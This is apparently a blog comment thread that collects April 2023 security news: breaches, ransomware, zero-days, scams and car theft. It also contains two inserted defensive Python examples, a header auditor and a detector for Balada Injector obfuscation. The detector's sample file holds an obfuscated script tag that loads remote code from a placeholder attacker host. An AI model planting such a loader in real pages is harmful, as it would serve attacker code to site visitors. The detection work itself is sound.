This posting is here to collect cyber security news in April 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
352 Comments
Tomi Engdahl says:
Yle was hit by a denial-of-service attack
Yle's online services were targeted by a denial-of-service attack yesterday, Tuesday.
https://www.iltalehti.fi/digiuutiset/a/2111d1ff-9185-4abb-987c-a56d20cee0a1
On Tuesday 4 April, denial-of-service attacks were directed at the websites of Helsinki Region Transport (HSL) and the Finnish Parliament. Yleisradio reports that it also fell victim to an attack.
The denial-of-service attack happened in the afternoon. Yle says it was able to limit the effects of the attack, so it was not visible to users of its services.
– Yle is a company critical to security of supply, and we have an obligation to ensure that our services work. That is why we have prepared for situations of this type, Chief Technology Officer Janne Yli-Äyhö says in a press release.
– We were able to react quickly, and our experts minimized the effects of the denial-of-service attack.
Yli-Äyhö cannot say whether the attack on Yle was connected to the other attacks carried out on the same day.
– It is pure speculation whether the attack against Yle is connected to these, but it does coincide in time.
According to the press release, attempted denial-of-service attacks are detected and repelled regularly.
Tomi Engdahl says:
Samsung workers made a major error by using ChatGPT
By Lewis Maddison published 1 day ago
Samsung meeting notes and new source code are now in the wild after being leaked in ChatGPT
https://www.techradar.com/news/samsung-workers-leaked-company-secrets-by-using-chatgpt
Samsung workers have unwittingly leaked top secret data whilst using ChatGPT to help them with tasks.
The company allowed engineers at its semiconductor arm to use the AI writer to help fix problems with their source code. But in doing so, the workers inputted confidential data, such as the source code itself for a new program, internal meeting notes, and data relating to their hardware.
The upshot is that in just under a month, there were three recorded incidences of employees leaking sensitive information via ChatGPT. Since ChatGPT retains user input data to further train itself, these trade secrets from Samsung are now effectively in the hands of OpenAI, the company behind the AI service.
In one of the aforementioned cases, an employee asked ChatGPT to optimize test sequences for identifying faults in chips, which is confidential – however, making this process as efficient as possible has the potential to save chip firms considerable time in testing and verifying processors, leading to reductions in cost too.
In another case, an employee used ChatGPT to convert meeting notes into a presentation, the contents of which were obviously not something Samsung would have liked external third parties to have known.
Samsung Electronics sent out a warning to its workers on the potential dangers of leaking confidential information in the wake of the incidences, saying that such data is impossible to retrieve as it is now stored on the servers belonging to OpenAI. In the semiconductor industry, where competition is fierce, any sort of data leak could spell disaster for the company in question.
It doesn’t seem as if Samsung has any recourse to request the retrieval or deletion of the sensitive data OpenAI now holds. Some have argued that this very fact makes ChatGPT non-compliant with the EU’s GDPR, as this is one of the core tenets of the law governing how companies collect and use data. It is also one of the reasons why Italy has now banned the use of ChatGPT nationwide.
Tomi Engdahl says:
The denial-of-service attack against Yle was also repelled successfully
https://www.tivi.fi/uutiset/tv/b616c95f-ed6a-4284-87d2-5e521183cec0
On Tuesday 4 April, denial-of-service attacks were directed at the websites of Helsinki Region Transport (HSL) and the Finnish Parliament. Yleisradio also reports that it fell victim to an attack. The denial-of-service attack happened in the afternoon. Yle says it was able to limit the effects of the attack, so it was not visible to users of its services. “Yle is a company critical to security of supply, and we have an obligation to ensure that our services work. That is why we have prepared for situations of this type,” Chief Technology Officer Janne Yli-Äyhö says in a press release.
Tomi Engdahl says:
FBI seizes stolen credentials market Genesis in Operation Cookie Monster https://www.bleepingcomputer.com/news/security/fbi-seizes-stolen-credentials-market-genesis-in-operation-cookie-monster/
The domains and infrastructure for Genesis Market, one of the most popular marketplaces for stolen credentials of all types, were seized by law enforcement earlier this week as part of Operation Cookie Monster. The action is an important blow to the cybercriminal world as Genesis was one of the major players offering both consumer and corporate account identities
Tomi Engdahl says:
Hackers can open Nexx garage doors remotely, and there’s no fix https://www.bleepingcomputer.com/news/security/hackers-can-open-nexx-garage-doors-remotely-and-theres-no-fix/
Multiple vulnerabilities discovered in Nexx smart devices can be exploited to control garage doors, disable home alarms, or smart plugs. There are five security issues disclosed publicly, with severity scores ranging from medium to critical, that the vendor has yet to acknowledge and fix. The most significant discovery is the use of universal credentials that are hardcoded in the firmware and also easy to obtain from the client communication with Nexx’s API. A video showing the impact of the security flaw, tracked as CVE-2023-1748, is available below. It could be used to open any Nexx-controlled garage door.
Tomi Engdahl says:
120 Arrested as Cybercrime Website Genesis Market Seized by FBI
https://www.securityweek.com/cybercrime-website-genesis-market-seized-by-fbi/
The FBI has seized Genesis Market, a major cybercrime website offering stolen device fingerprints.
The Genesis Market cybercrime website appears to have been taken down as part of an international law enforcement operation.
The domains associated with Genesis Market currently display an image informing visitors that the website has been seized by the FBI based on a warrant issued by a Wisconsin court.
The new Genesis Market homepage reveals that the domains were seized as part of an operation named ‘Cookie Monster’, with over a dozen European and North American law enforcement agencies being credited for their role in the takedown.
Authorities in the US and Europe have yet to issue a statement on the seizure of Genesis Market.
Security blogger Brian Krebs reported that the law enforcement operation also involved dozens of arrests in the United States and other countries.
However, the message posted by the FBI on seized domains — which instructs those who have been in contact with Genesis administrators to contact the agency — suggests that the site’s operators have yet to be identified or captured.
The Genesis marketplace has been around since late 2018, offering cybercriminals access to hundreds of thousands of so-called ‘bots’ that could be used to carry out malicious activities and bypass anti-fraud systems.
These bots, which are actually browser fingerprints obtained by information-stealing malware, provide cybercriminals the credentials needed to access various services and systems while making it seem like the access request is coming from the legitimate user’s machine, thus avoiding triggering any alarms.
“Genesis marketplace was an invite-only cybercrime institution that held data on account holders from almost all major websites,” said Mark Lamb, CEO of HighGround.io. “The operators offered customers a pre-made package on victims, enabling them to access accounts and execute attacks quickly, with all the information they needed to commit fraud. Unfortunately, very few victims were aware they had been compromised until money was stolen or goods were purchased, as there was nothing malicious for threat detection tools to alert on.”
FBI Seizes Bot Shop ‘Genesis Market’ Amid Arrests Targeting Operators, Suppliers
https://krebsonsecurity.com/2023/04/fbi-seizes-bot-shop-genesis-market-amid-arrests-targeting-operators-suppliers/
Tomi Engdahl says:
Tax Return Filing Service eFile.com Caught Serving Malware
https://www.securityweek.com/tax-return-filing-service-efile-com-caught-serving-malware/
Online tax return filing service eFile.com was injected with malicious JavaScript code serving malware to visitors.
eFile.com, an online service that helps individuals file tax returns, was injected with malicious code that led to malware being delivered to visitors.
The software service, which is authorized by the Internal Revenue Service (IRS), albeit not operated by the agency, was seen serving malware for several weeks, until it was cleaned up earlier this week.
The eFile.com compromise was initially observed in mid-March, when a user posted on Reddit the first details of the issue: visitors were redirected to a fake ‘network error’ page and were served a fake browser update.
When clicking on the ‘browser update’ link, users were served one of two executables, named ‘update.exe’ and ‘installer.exe’.
On Monday, Johannes Ullrich of the SANS Internet Storm Center revealed that the malicious files had very low detection rates on VirusTotal. He also discovered that ‘update.exe’ was signed with a valid certificate from Sichuan Niurui Science and Technology Co., Ltd.
Tomi Engdahl says:
https://www.securityweek.com/kpmg-tackles-ai-security-with-cranium-spinout/
Tomi Engdahl says:
https://www.securityweek.com/chrome-112-patches-16-security-flaws/
Tomi Engdahl says:
Android’s April 2023 Updates Patch Critical Remote Code Execution Vulnerabilities
https://www.securityweek.com/androids-april-2023-updates-patch-critical-remote-code-execution-vulnerabilities/
Android’s April 2023 security updates were released this week with patches for two critical-severity vulnerabilities leading to remote code execution.
Tomi Engdahl says:
Maija paid 1,000 euros for a flagship phone and wondered why it worked so poorly – a visit to a store revealed the phone was counterfeit
You have to be careful on online flea markets. Iltalehti reader Maija told her story of buying a new phone.
There is a difference between the displays of the counterfeit and the genuine phone. Otherwise the device looks the same on the outside.
https://www.iltalehti.fi/digiuutiset/a/2927e89a-e078-461f-9041-7a95888e1732
Maija bought a new Samsung Galaxy S23 Ultra flagship phone from an online flea market for over a thousand euros. The purchase, which seemed genuine, in the end was not what the seller had promised Maija.
Maija, who works in IT, set out to verify the phone's authenticity. The unique IMEI code used to identify the phone checked out. The situation was strange.
While installing operating system updates, it turned out that the new phone was running an operating system more than three years old. When logging in to Google's app store, the store identified the phone as something completely different from what Maija thought her new phone was. According to the app store, the phone Maija had bought was actually a Samsung Galaxy Note10. It was certainly a flagship phone when it was released in 2019, but in four years it has fallen far from the top – production of the model was already discontinued in 2021.
The IMEI code of the phone Maija bought had probably been cloned. Maija could no longer reach the online seller, and at this point concluded that she had fallen victim to a cunning scam.
Counterfeits are rare
Producing this kind of counterfeit of a new phone is not an easy task. According to the Lifewire site, cloning a phone's IMEI code is also illegal in most of the world.
– Counterfeit Samsung phones are extremely rare in Finland, Samsung Finland's country manager Mika Engblom says.
The Techlicious site says that cloning can be done, for example, for espionage purposes.
Large numbers of counterfeit phones have been in circulation in recent years.
How to Tell if Your Phone Has Been Cloned
https://www.techlicious.com/tip/how-to-tell-if-your-phone-has-been-cloned/
Our phones are the key to our digital identity, so it’s no wonder that mobiles have become increasingly attractive targets for cybercriminals, who have at their disposal a fair number of ways to hack a smartphone, some of which require more access and technical savvy than others.
Phone cloning – or the copying of the identification credentials a phone uses to connect to cellular networks – is one method that usually requires the perpetrator to have direct access to a device. That makes it less prevalent than, say, hacking an operating system vulnerability that hasn’t been updated, but the consequences are equal to that of most phone hacks – your personal data is exposed, with potential financial consequences or identity fraud.
How to Clone a Phone Without Ever Touching It
You don’t even need to touch your phone to save all your data.
https://www.lifewire.com/how-to-clone-phone-without-touching-it-4570908
What to Know
Install Dr.Fone on your PC or Mac and connect the phone you want to copy, then connect another phone to transfer the copied data.
For Android only: Install CLONEit on both mobile devices to transfer all data from one phone to another over Wi-Fi.
The device you copy your phone’s data to may need its own SIM card to work.
Tomi Engdahl says:
https://www.tekniikkatalous.fi/uutiset/samsungin-nolo-moka-nain-ei-chatgptta-kannata-kayttaa/5671ee58-2102-416a-9b1f-92d0b644e7f1
Tomi Engdahl says:
https://www.popsci.com/technology/nexx-garage-door-cyber-vulnerability/
Tomi Engdahl says:
A secret was revealed in Apple's computers – a strange file that does not belong there is hidden in them https://www.is.fi/digitoday/art-2000009504810.html
A PDF file hidden in the operating system defines the basics of the bitcoin virtual currency.
Tomi Engdahl says:
https://www.washingtonpost.com/technology/2023/04/04/dish-network-data-breach-advice/
Tomi Engdahl says:
These are the most dangerous files – a hacker explains how to protect yourself https://www.is.fi/digitoday/tietoturva/art-2000009496559.html
Tomi Engdahl says:
MSI Reportedly Hacked by Money Message Ransomware Gang, Source Code Stolen
MSI Listed on Ransomware Gang’s Extortion Portal, Threatens to Leak Stolen Source Code.
https://www.cyberkendra.com/2023/04/msi-reportedly-hacked-by-money-message.html
Tomi Engdahl says:
Tesla workers shared sensitive images recorded by customer cars
Some of the camera footage showed “intimate” moments, images of Tesla owners’ children or property — some of which was shared internally, Reuters reported.
https://www.nbcnews.com/business/business-news/tesla-workers-shared-sensitive-images-recorded-by-customer-cars-rcna78502
Tomi Engdahl says:
Tesla Driver Freaked Out After App Allows Him to Drive Off With the Wrong Car
“My family is not feeling safe right now.”
https://futurism.com/tesla-driver-unlocks-wrong-car-app
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/technology/flipper-zero-banned-by-amazon-for-being-a-card-skimming-device-/
Tomi Engdahl says:
MSI hit in cyberattack, warns against installing knock-off firmware
1.5TB of databases, source code, BIOS tools said to be stolen
https://www.theregister.com/2023/04/07/msi_cyberattack_bios/
Owners of MSI-brand motherboards, GPUs, notebooks, PCs, and other equipment should exercise caution when updating their device’s firmware or BIOS after the manufacturer revealed it has recently suffered a cyberattack.
In a statement shared on Friday, MSI urged users “to obtain firmware/BIOS updates only from its official website,” and to avoid using files from other sources.
https://www.msi.com/news/detail/MSI-Statement-141688
Tomi Engdahl says:
WinRAR SFX archives can run PowerShell without being detected
https://www.bleepingcomputer.com/news/security/winrar-sfx-archives-can-run-powershell-without-being-detected/
Hackers are adding malicious functionality to WinRAR self-extracting archives that contain harmless decoy files, allowing them to plant backdoors without triggering the security agent on the target system.
Self-extracting archives (SFX) created with compression software like WinRAR or 7-Zip are essentially executables that contain archived data along with a built-in decompression stub (the code for unpacking the data). SFX files can be password-protected to prevent unauthorized access.
Tomi Engdahl says:
https://arstechnica.com/gadgets/2023/04/google-drive-cancels-its-surprise-file-cap-promises-to-communicate-better/
Tomi Engdahl says:
More than half of organizations already apply the Zero Trust principle
https://www.advania.fi/blogi/zero-trust-periaatetta-soveltaa-jo-yli-puolet-organisaatioista
Tomi Engdahl says:
A devilish Omakanta scam is lurking for Finns: you look up your health records and lose your money instead
Scams have been reported in the Omavero and Omakanta services, among others.
https://www.iltalehti.fi/tietoturva/a/a65d0800-3852-4e51-8a35-5c4ae54deafb
Recently there have been many reports of people falling victim to online scams while using the online services of Finnish authorities. The National Cyber Security Centre of the Finnish Transport and Communications Agency Traficom has warned about the matter.
The scams are carried out using Google ads. In these cases, a victim searching for an agency's online service clicks an ad disguised as an official link. The link leads to a genuine-looking site that is in reality a scam site. Genuine-looking scam versions have been made of at least the Omavero and Omakanta sites.
Tomi Engdahl says:
https://www.kyberturvallisuuskeskus.fi/fi/huijarit-kaappaavat-pankkitunnuksia-omakannan-ja-suomifi-palvelun-nimissa
Tomi Engdahl says:
Finnish phone numbers in the wrong hands: don't believe a caller like this
https://www.tivi.fi/uutiset/tv/25e64b48-6e94-4850-b981-c2dc012d6907
Traficom's National Cyber Security Centre reports having received several reports in recent weeks of Finnish phone numbers being used in scam and nuisance calls. The number of reports has been clearly rising.
Spoofing the caller's phone number, the so-called A-number, is a commonly used technique. It lets criminals make the caller's number match a Finnish phone number that is already in use. A domestic number is often more convincing than a call from abroad. The calls, however, are usually made in English.
Tomi Engdahl says:
Medusa ransomware claims attack on Open University of Cyprus https://www.bleepingcomputer.com/news/security/medusa-ransomware-claims-attack-on-open-university-of-cyprus/
The Medusa ransomware gang has claimed a cyberattack on the Open University of Cyprus (OUC), which caused severe disruptions of the organization’s operations. OUC is an online university based in Nicosia, Cyprus, that provides remote learning. It offers 30 higher-level education programs to 4,200 students and participates in various scientific research activities. Last week, the university published an announcement about a cyberattack that had occurred on March 27, that resulted in several central services and critical systems going offline
Tomi Engdahl says:
Western Digital confirms breach, affects My Cloud and SanDisk users https://www.malwarebytes.com/blog/news/2023/04/western-digital-confirms-breach-affects-my-cloud-and-sandisk-users
Western Digital, a big brand in digital storage, says it has suffered a “network security incident” – potentially ransomware – which resulted in a breach and some system disruptions in its business operations. The company identified the incident on March 26 and said an unnamed third party unlawfully accessed several computer systems to steal data. The investigation is ongoing and Western Digital has yet to learn how much was taken.
Tomi Engdahl says:
Money Message ransomware gang claims MSI breach, demands $4 million https://www.bleepingcomputer.com/news/security/money-message-ransomware-gang-claims-msi-breach-demands-4-million/
Taiwanese PC parts maker MSI (Micro-Star International) has been listed on the extortion portal of a new ransomware gang known as “Money Message,” which claims to have stolen source code from the company’s network. MSI is a global hardware giant that makes motherboards, graphics cards, desktops, laptops, servers, industrial systems, PC peripherals, and infotainment products, with an annual revenue that surpasses $6.5 billion. The threat actor has listed MSI on its data leak website and posted screenshots of what they claim to be the hardware vendor’s CTMS and ERP databases and files containing software source code, private keys, and BIOS firmware
Tomi Engdahl says:
MERCURY and DEV-1084: Destructive attack on hybrid environment https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/
Microsoft Threat Intelligence has detected destructive operations enabled by MERCURY, a nation-state actor linked to the Iranian government, that attacked both on-premises and cloud environments.
While the threat actors attempted to masquerade the activity as a standard ransomware campaign, the unrecoverable actions show destruction and disruption were the ultimate goals of the operation.
Previous MERCURY attacks have been observed targeting on-premises environments; however, the impact in this case notably also included destruction of cloud resources. Microsoft assesses that MERCURY likely worked in partnership with another actor that Microsoft tracks as DEV-1084, who carried out the destructive actions after MERCURY’s successful operations had gained access to the target environment.
Tomi Engdahl says:
Apple fixes two zero-days exploited to hack iPhones and Macs https://www.bleepingcomputer.com/news/apple/apple-fixes-two-zero-days-exploited-to-hack-iphones-and-macs/
Apple has released emergency security updates to address two new zero-day vulnerabilities exploited in attacks to compromise iPhones, Macs, and iPads. “Apple is aware of a report that this issue may have been actively exploited,” the company said when describing the issues in security advisories published on Friday. The first security flaw (tracked as CVE-2023-28206) is an IOSurfaceAccelerator out-of-bounds write that could lead to corruption of data, a crash, or code execution. Successful exploitation allows attackers to use a maliciously crafted app to execute arbitrary code with kernel privileges on targeted devices. The second zero-day (CVE-2023-28205) is a WebKit use after free weakness that allows data corruption or arbitrary code execution when reusing freed memory
Tomi Engdahl says:
MSI confirms security breach following ransomware attack claims http://bleepingcomputer.com/news/security/msi-confirms-security-breach-following-ransomware-attack-claims/
Following reports of a ransomware attack, Taiwanese PC vendor MSI (short for Micro-Star International) confirmed today that its network was breached in a cyberattack. Earlier this week, the Money Message ransomware gang allegedly infiltrated some of MSI’s systems and stole files that will be leaked online next week if the company refuses to pay a $4 million ransom. In a Friday filing with Taiwan’s Stock Exchange (TWSE), first spotted by PCMag, MSI revealed that some of its information service systems had been affected by a cyberattack reported to the relevant authorities. “After detecting some information systems being attacked by hackers, MSI’s IT department has initiated information security defense mechanism and recovery procedures. The Company also has been reported [sic] the anomaly to the relevant government authorities,” MSI said
Tomi Engdahl says:
Visitors of tax return e-file service may have downloaded malware https://www.malwarebytes.com/blog/news/2023/04/visitors-of-tax-return-e-file-service-may-have-downloaded-malware
The IRS-authorized electronic filing service for tax returns, eFile.com, has been caught serving a couple of malicious JavaScript (JS) files these past few weeks, according to several security researchers and corroborated by BleepingComputer. Note this security incident only concerns eFile.com, not the IRS’ e-file infrastructure and other similar-sounding domains. As of this writing, eFile.com is clean. Users can access it without worry.
Tomi Engdahl says:
Security headers you should add into your application to increase cyber risk protection
https://isc.sans.edu/diary/Security+headers+you+should+add+into+your+application+to+increase+cyber+risk+protection/29720
Web applications are a wide world that is currently the object of numerous cyberattacks, mostly seeking to compromise the information directly in the clients that use them. Considering the shortage of programmers, most of them are looking to finish the developments that are requested in the shortest periods of time. Although development frameworks carry out some default protection for attacks such as SQL Injection, the same is not the case for other types of attacks. I have been able to demonstrate the framework’s default security protections in multiple developments, which opens up vulnerable scenarios such as the ones described, and other scenarios such as man-in-the-middle attacks (MITM), cross-site scripting and cross-site injections.
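The diary above argues that framework defaults leave MITM and XSS uncovered and that response headers close part of that gap. The following is an added Python example, not code from the SANS diary: it audits a captured set of response headers against a baseline of widely deployed headers (HSTS, CSP, X-Content-Type-Options, X-Frame-Options, Referrer-Policy) that I chose for the example; the two header sets are constructed, and the specific header list is not taken from the diary excerpt.

```python
import re

# Constructed responses: what a framework typically emits by default, and a hardened set.
DEFAULT_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "Server": "Apache",
    "Set-Cookie": "session=abc123; Path=/",
}
HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' https://static.example.com",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Referrer-Policy": "strict-origin-when-cross-origin",
}

ONE_YEAR = 31536000


def _get(headers, name):
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def check_hsts(value):
    """HSTS defends against SSL-stripping style MITM; require a max-age of at least one year."""
    if value is None:
        return "missing; browsers may be downgraded to plain HTTP (MITM)"
    match = re.search(r"max-age=(\d+)", value, re.I)
    if not match or int(match.group(1)) < ONE_YEAR:
        return "max-age shorter than one year"
    return None


def check_csp(value):
    """CSP limits where scripts may load from, which blunts reflected and stored XSS."""
    if value is None:
        return "missing; no browser-side XSS mitigation"
    directives = {}
    for raw in value.split(";"):
        parts = raw.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return "neither script-src nor default-src is set"
    if "'unsafe-inline'" in sources or "*" in sources:
        return "script sources permit inline or wildcard scripts"
    return None


def check_exact(expected):
    """Factory for headers that must carry one of a fixed set of values."""
    def check(value):
        if value is None:
            return "missing"
        if value.strip().upper() not in expected:
            return "unexpected value %r" % value
        return None
    return check


CHECKS = {
    "Strict-Transport-Security": check_hsts,
    "Content-Security-Policy": check_csp,
    "X-Content-Type-Options": check_exact({"NOSNIFF"}),
    "X-Frame-Options": check_exact({"DENY", "SAMEORIGIN"}),
    "Referrer-Policy": lambda v: "missing" if v is None else None,
}


def audit_headers(headers):
    """Return {header: problem} for every baseline header that is absent or weak."""
    problems = {}
    for name, check in CHECKS.items():
        problem = check(_get(headers, name))
        if problem:
            problems[name] = problem
    return problems


if __name__ == "__main__":
    for label, response in (("default", DEFAULT_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_headers(response) or "OK")
```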
Tomi Engdahl says:
With ICMP magic, you can snoop on vulnerable HiSilicon, Qualcomm-powered Wi-Fi https://www.theregister.com/2023/04/07/wifi_access_icmp/
A vulnerability identified in at least 55 Wi-Fi router models can be exploited by miscreants to spy on victims’ data as it’s sent over a wireless network. Eggheads in China and the US have published details of a security shortcoming in the network processing units (NPUs) in Qualcomm and HiSilicon chips found at the heart of various wireless access points (APs). The flaw (CVE-2022-25667) prevents the devices from blocking forged Internet Control Message Protocol (ICMP) messages; these messages can be abused to hijack and observe a victim’s wireless connectivity. ICMP is a network layer protocol primarily used for diagnosing network traffic issues. It’s mainly used for error reporting, though it can be misused for denial of service via ICMP flood attacks
Tomi Engdahl says:
Exploit available for critical bug in VM2 JavaScript sandbox library https://www.bleepingcomputer.com/news/security/exploit-available-for-critical-bug-in-vm2-javascript-sandbox-library/
Proof-of-concept exploit code has been released for a recently disclosed critical vulnerability in the popular VM2 library, a JavaScript sandbox that is used by multiple software to run code securely in a virtualized environment. The library is designed to run untrusted code in an isolated context on Node.js servers. It allows partial execution of the code and prevents unauthorized access to system resources or to external data. VM2 has more than 16 million monthly downloads via the NPM package repository and it is used by integrated development environments (IDEs) and code editors, function-as-a-service (FaaS) solutions, pen-testing frameworks, security tools, and various JavaScript-related products
Tomi Engdahl says:
Apple on Friday pushed out a major iOS security update to fix a pair of zero-day vulnerabilities already being exploited in the wild.
The newest iOS 16.4.1 and iPadOS 16.4.1 updates cover code execution software flaws in IOSurfaceAccelerator and WebKit, suggesting a complex exploit chain was detected in the wild hitting the latest iPhone devices.
“Apple is aware of a report that this issue may have been actively exploited,” Cupertino says in a barebones advisory that credits Google and Amnesty International with reporting the issue.
Apple Ships Urgent iOS Patch for Newly Exploited Zero-Days
The newest iOS 16.4.1 and iPadOS 16.4.1 patches a pair of code execution flaws that have already been exploited in the wild.
https://www.securityweek.com/apple-ships-urgent-ios-patch-for-newly-exploited-zero-days/
Tomi Engdahl says:
Breached shutdown sparks migration to ARES data leak forums https://www.bleepingcomputer.com/news/security/breached-shutdown-sparks-migration-to-ares-data-leak-forums/
A threat group called ARES is gaining notoriety on the cybercrime scene by selling and leaking databases stolen from corporations and public authorities. The actor emerged on Telegram in late 2021 and has been associated with the RansomHouse ransomware operation and the data leak platform, KelvinSecurity, and the network access group Adrastea.
ARES Group manages its own site with database leaks and a forum, which may fill the void left by the now defunct Breached forum. Cyfirma reports that ARES displays a cartel-like behavior, actively seeking affiliations with other threat actors
Tomi Engdahl says:
Microsoft Netlogon: Potential Upcoming Impacts of CVE-2022-38023
https://isc.sans.edu/diary/Microsoft+Netlogon+Potential+Upcoming+Impacts+of+CVE202238023/29728
This has been brought to our attention by a reader (thank you, William!). The vulnerability CVE-2022-38038 affected the Microsoft Netlogon procedure with an RPC escalation of privilege vulnerability.
Microsoft provided a patch to fix it. It improves the Netlogon security by enforcing RPC sealing instead of signing off the communication with the Domain Controller. RPC sealing is a security measure that both signs and encrypts the messages sent over the wire by the Netlogon protocol. Microsoft released a knowledge base article with more information about the technique used to fix the vulnerability
Tomi Engdahl says:
CISA orders agencies to patch Backup Exec bugs used by ransomware gang https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-backup-exec-bugs-used-by-ransomware-gang/
On Friday, U.S. Cybersecurity and Infrastructure Security Agency (CISA) increased by five its list of security issues that threat actors have used in attacks, three of them in Veritas Backup Exec exploited to deploy ransomware. One of the vulnerabilities was exploited as a zero-day as part of an exploit chain that targeted Samsung’s web browser, and another allows attackers to increase privileges on Windows machines. Of the five vulnerabilities that CISA added to the catalog of Known Exploited Vulnerabilities (KEV) today, only one was rated critical, an issue in Veritas data protection software tracked as CVE-2021-27877 that allows remote access and command execution with elevated privileges.
Tomi Engdahl says:
CISA orders govt agencies to update iPhones, Macs by May 1st https://www.bleepingcomputer.com/news/security/cisa-orders-govt-agencies-to-update-iphones-macs-by-may-1st/
The Cybersecurity and Infrastructure Security Agency (CISA) ordered federal agencies to patch two security vulnerabilities actively exploited in the wild to hack iPhones, Macs, and iPads. According to a binding operational directive (BOD 22-01) issued in November 2022, Federal Civilian Executive Branch Agencies (FCEB) agencies are required to patch their systems against all security bugs added to CISA’s Known Exploited Vulnerabilities catalog. FCEB agencies now have to secure iOS, iPadOS, and macOS devices until May 1st, 2023, against two flaws addressed by Apple on Friday and added to CISA’s list of bugs exploited in attacks on Monday
Tomi Engdahl says:
Over 1 Million WordPress Sites Infected by Balada Injector Malware Campaign https://thehackernews.com/2023/04/over-1-million-wordpress-sites-infected.html
Over one million WordPress websites are estimated to have been infected by an ongoing campaign to deploy malware called Balada Injector since 2017. The massive campaign, per GoDaddy’s Sucuri, “leverages all known and recently discovered theme and plugin vulnerabilities” to breach WordPress sites. The attacks are known to play out in waves once every few weeks. “This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites,” security researcher Denis Sinegubko said.
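The report above singles out String.fromCharCode obfuscation as the quickest way to recognise Balada's injected scripts. The following is an added example, not code from Sucuri or The Hacker News: a small triage helper that decodes every String.fromCharCode(...) call found in a theme or plugin file so the hidden loader text can be read, and extracts any host names it spells out for blocking. The sample file contents are constructed for the example, and "k3f.newly-reg.example" is a placeholder, not a real Balada domain.

```python
"""Added example, not from Sucuri's or The Hacker News' report.

A triage helper for the String.fromCharCode obfuscation the report names as
a marker of Balada Injector: it decodes every String.fromCharCode(...) call
in a script so the hidden text can be read, and pulls out any URL hosts for
blocking or pivoting. The sample file contents are constructed for this
example; "k3f.newly-reg.example" is a placeholder, not a real Balada domain.
"""
import re
from typing import Dict, List

# String.fromCharCode( 104 , 116, ... ) with optional whitespace around tokens.
FROMCHARCODE_RE = re.compile(
    r"String\.fromCharCode\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)", re.IGNORECASE)
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def decode_fromcharcode(js: str) -> List[str]:
    """Decode each String.fromCharCode(n, n, ...) literal into its text."""
    out = []
    for m in FROMCHARCODE_RE.finditer(js):
        codes = (int(c) for c in re.split(r"\s*,\s*", m.group(1)))
        out.append("".join(chr(c) for c in codes if c <= 0x10FFFF))
    return out


def scan_script(text: str) -> Dict[str, object]:
    """Return the decoded pieces, any hosts they spell out, and a triage flag.

    Pieces are joined in order because injectors concatenate them with '+'.
    Legitimate minified code also calls fromCharCode, so the flag requires a
    decoded URL host, not merely the function's presence.
    """
    pieces = decode_fromcharcode(text)
    hosts = sorted({h.lower() for h in URL_HOST_RE.findall("".join(pieces))})
    return {
        "fromcharcode_calls": len(pieces),
        "decoded": pieces,
        "hosts": hosts,
        "suspicious": bool(hosts),
    }


# Constructed samples: a theme footer with an injected loader, and a clean one.
INFECTED_SAMPLE = (
    "<?php wp_footer(); ?>\n"
    "<script>var s=document.createElement('script');"
    "s.src=String.fromCharCode(104,116,116,112,115,58,47,47)+"
    "String.fromCharCode(107,51,102,46,110,101,119,108,121,45,114,101,103,"
    "46,101,120,97,109,112,108,101,47,108,111,97,100,101,114,46,106,115);"
    "document.head.appendChild(s);</script>\n"
)
CLEAN_SAMPLE = "<?php wp_footer(); ?>\n<script>console.log('ok');</script>\n"

if __name__ == "__main__":
    for name, sample in (("infected", INFECTED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, scan_script(sample))
```

Run it over a site's wp-content tree and review the `decoded` pieces of anything flagged; the other two markers in the report (freshly registered domains, redirects to scam sites) need WHOIS age data and a live fetch, which this offline helper deliberately does not attempt.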
Tomi Engdahl says:
KFC, Pizza Hut owner discloses data breach after ransomware attack https://www.bleepingcomputer.com/news/security/kfc-pizza-hut-owner-discloses-data-breach-after-ransomware-attack/
Yum! Brands, the brand owner of the KFC, Pizza Hut, and Taco Bell fast food chains, is now sending data breach notification letters to an undisclosed number of individuals whose personal information was stolen in a January 13 ransomware attack. This comes after the company said that although some data was stolen from its network, it had no evidence that the attackers exfiltrated any customer information. In the breach notification letters sent to affected people starting Thursday, Yum! Brands revealed that it has now found out the attackers stole some individuals’ personal information, including names, driver’s license numbers, and other ID card numbers.
Tomi Engdahl says:
Thieves Use CAN Injection Hack to Steal Cars
https://www.securityweek.com/thieves-use-can-injection-hack-to-steal-cars/
An innocent-looking portable speaker can hide a hacking device that launches CAN injection attacks, which have been used to steal cars.
A hacking device can allow thieves to steal a wide range of car models using an attack method named CAN injection, researchers have revealed.
Automotive cybersecurity experts Ian Tabor of the EDAG Group and Ken Tindell, CTO of Canis Automotive Labs, started analyzing these attacks after Tabor had his 2021 Toyota RAV4 stolen last year.
The car was stolen after Tabor had found, on two occasions, that someone had pulled apart his headlight and unplugged the cables. What initially appeared to be vandalism turned out to be part of an attempt to steal the vehicle.
Specifically, the thieves pulled off the bumper and unplugged the headlight cables in an attempt to reach wires connected to an electronic control unit (ECU) responsible for the vehicle’s smart key.
An investigation conducted by Tabor showed that the thieves likely connected a special hacking device that allowed them to unlock the vehicle and drive away.
Such hacking devices can be acquired on dark web sites for up to €5,000 ($5,500), and they are often advertised as ‘emergency start’ devices that can be used by vehicle owners who have lost their keys or automotive locksmiths. In the case of the device designed for Toyota cars, the electronics responsible for hacking the vehicle are hidden inside a Bluetooth speaker case.
